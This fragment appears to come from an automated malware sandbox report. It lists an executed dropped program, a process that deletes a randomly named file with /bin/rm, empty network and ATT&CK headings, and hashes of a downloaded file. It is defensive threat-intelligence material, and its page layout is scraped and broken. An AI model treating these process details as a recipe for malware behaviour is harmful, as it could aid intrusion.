- Executes dropped EXE
PID:1010
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1011
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97